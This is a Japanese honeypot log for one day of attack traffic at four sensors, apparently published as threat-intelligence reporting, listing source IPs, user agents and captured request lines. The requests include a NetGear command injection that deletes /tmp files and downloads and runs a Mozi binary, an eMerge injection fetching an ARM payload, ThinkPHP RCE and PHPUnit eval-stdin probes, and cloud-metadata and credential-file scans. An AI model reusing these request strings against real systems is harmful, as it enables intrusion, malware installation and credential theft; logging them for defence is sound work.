ハニーポット(仮) 観測記録 2020/02/02分です。
特徴
Location:JP
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
/.aws/credentialsへのスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Tomcat管理画面へのスキャン行為
Apache Solrへのスキャン行為
/.aws/credentialsへのスキャン行為
を確認しました。
Location:UK
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
WordPressの設定ファイルへのスキャン行為
を確認しました。
Location:SG
Linear eMerge E3製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:106 (前日比:-5)
US:総アクセス数:32 (前日比:-3)
UK:総アクセス数:26 (前日比:-89)
SG:総アクセス数:21 (前日比:-3072)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 110.153.74.104 | China |
| 1 | 13.232.177.195 | India |
| 1 | 13.236.207.116 | Australia |
| 1 | 13.239.31.105 | Australia |
| 1 | 13.48.196.156 | Sweden |
| 1 | 13.53.60.46 | Sweden |
| 1 | 13.56.226.246 | United States |
| 1 | 13.57.197.131 | United States |
| 1 | 14.243.153.139 | Vietnam |
| 1 | 15.188.11.120 | United States |
| 1 | 15.236.39.121 | United States |
| 1 | 179.179.89.147 | Brazil |
| 1 | 18.184.142.33 | United States |
| 1 | 193.110.113.141 | Ukraine |
| 5 | 193.57.40.38 | Ukraine |
| 1 | 222.186.19.221 | China |
| 1 | 3.10.140.249 | United Kingdom |
| 1 | 3.106.123.29 | Australia |
| 1 | 3.126.139.157 | Germany |
| 1 | 3.135.209.163 | United States |
| 1 | 35.173.177.0 | United States |
| 1 | 35.182.34.144 | Canada |
| 1 | 3.8.101.12 | United Kingdom |
| 36 | 40.112.129.217 | United States |
| 17 | 44.224.22.196 | United States |
| 17 | 44.225.84.206 | United States |
| 1 | 46.166.187.111 | Netherlands |
| 2 | 49.51.9.196 | China |
| 1 | 52.62.196.199 | United States |
| 1 | 54.193.56.205 | United States |
| 1 | 63.143.35.226 | United States |
| 1 | 78.29.15.81 | Russia |
| 1 | 81.102.158.26 | United Kingdom |
| 1 | 82.137.26.110 | Romania |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 31 | - |
| 1 | ApiTool |
| 14 | AWS Security Scanner |
| 18 | curl/7.47.0 |
| 1 | Go-http-client/1.1 |
| 36 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 6 | - | ||
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 4 | GET | /.aws/credentials | HTTP/1.1 |
| 15 | GET | /.env | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http://example[.]com/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /.local | HTTP/1.1 |
| 1 | GET | /.production | HTTP/1.1 |
| 1 | GET | /.remote | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://172[.]36[.]47[.]85:47921/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //api2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | POST | //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //lib/phpunit/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //lib/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //lib/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //phpunit/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //sites/default/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //vendor/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //vendor/phpunit/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 12 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01D\x01 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 13.48.6.1 | Sweden |
| 1 | 13.56.241.159 | United States |
| 1 | 177.54.135.189 | Brazil |
| 1 | 18.184.6.89 | United States |
| 1 | 18.228.6.34 | United States |
| 1 | 193.188.22.152 | Russia |
| 5 | 193.57.40.38 | Ukraine |
| 1 | 222.186.19.221 | China |
| 1 | 3.124.185.55 | Germany |
| 1 | 35.181.6.188 | France |
| 1 | 46.166.187.111 | Netherlands |
| 5 | 5.101.0.209 | Russia |
| 1 | 52.37.123.154 | United States |
| 1 | 52.53.171.198 | United States |
| 1 | 52.58.37.149 | Germany |
| 1 | 52.66.252.54 | India |
| 1 | 54.180.114.103 | South Korea |
| 1 | 60.191.66.222 | China |
| 1 | 63.143.35.226 | United States |
| 2 | 89.248.174.146 | Netherlands |
| 1 | 89.248.174.253 | Netherlands |
| 2 | 91.217.63.153 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 7 | - |
| 2 | ApiTool |
| 11 | curl/7.47.0 |
| 1 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | - | ||
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 2 | GET | /.aws/credentials | HTTP/1.1 |
| 9 | GET | /.env | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 2 | GET | ../../proc/ | HTTP |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 2 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | \x03 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 13.233.20.88 | India |
| 1 | 13.239.23.157 | Australia |
| 1 | 15.222.46.145 | United States |
| 1 | 18.144.133.54 | United States |
| 1 | 18.197.42.156 | United States |
| 1 | 187.45.105.164 | Brazil |
| 1 | 189.147.0.245 | Mexico |
| 1 | 193.188.22.152 | Russia |
| 4 | 193.57.40.38 | Ukraine |
| 1 | 200.56.11.21 | Mexico |
| 1 | 222.186.19.221 | China |
| 2 | 23.97.200.17 | United States |
| 1 | 3.15.218.156 | United States |
| 1 | 35.180.110.228 | France |
| 1 | 46.166.187.111 | Netherlands |
| 1 | 54.193.120.1 | United States |
| 1 | 54.193.122.117 | United States |
| 1 | 86.123.142.103 | Romania |
| 2 | 89.248.174.146 | Netherlands |
| 2 | 89.248.174.253 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 2 | ApiTool |
| 9 | curl/7.47.0 |
| 1 | Go-http-client/1.1 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | - | ||
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 6 | GET | /.env | HTTP/1.1 |
| 1 | GET | ../../ | HTTP |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 3 | GET | ../../proc/ | HTTP |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 3 | GET | /wp-config.php | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | OPTIONS | / | HTTP/1.1 |
| 2 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | \x03 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 1.214.214.170 | South Korea |
| 1 | 153.226.32.150 | Japan |
| 1 | 168.196.174.5 | Brazil |
| 1 | 187.59.154.14 | Brazil |
| 1 | 193.188.22.152 | Russia |
| 1 | 200.52.36.156 | Mexico |
| 1 | 222.186.19.221 | China |
| 1 | 46.97.120.194 | Romania |
| 5 | 5.101.0.209 | Russia |
| 1 | 5.188.206.50 | Russia |
| 1 | 5.96.237.174 | Italy |
| 1 | 63.143.35.226 | United States |
| 1 | 85.102.10.96 | Turkey |
| 3 | 89.248.174.146 | Netherlands |
| 1 | 89.248.174.253 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 14 | - |
| 1 | ApiTool |
| 1 | Go-http-client/1.1 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 7 | - | ||
| 1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /card_scan_decoder.php?No=30&door=%60wget | http://switchnets.net/hoho.arm7; |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 3 | GET | ../../proc/ | HTTP |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | \x03 |
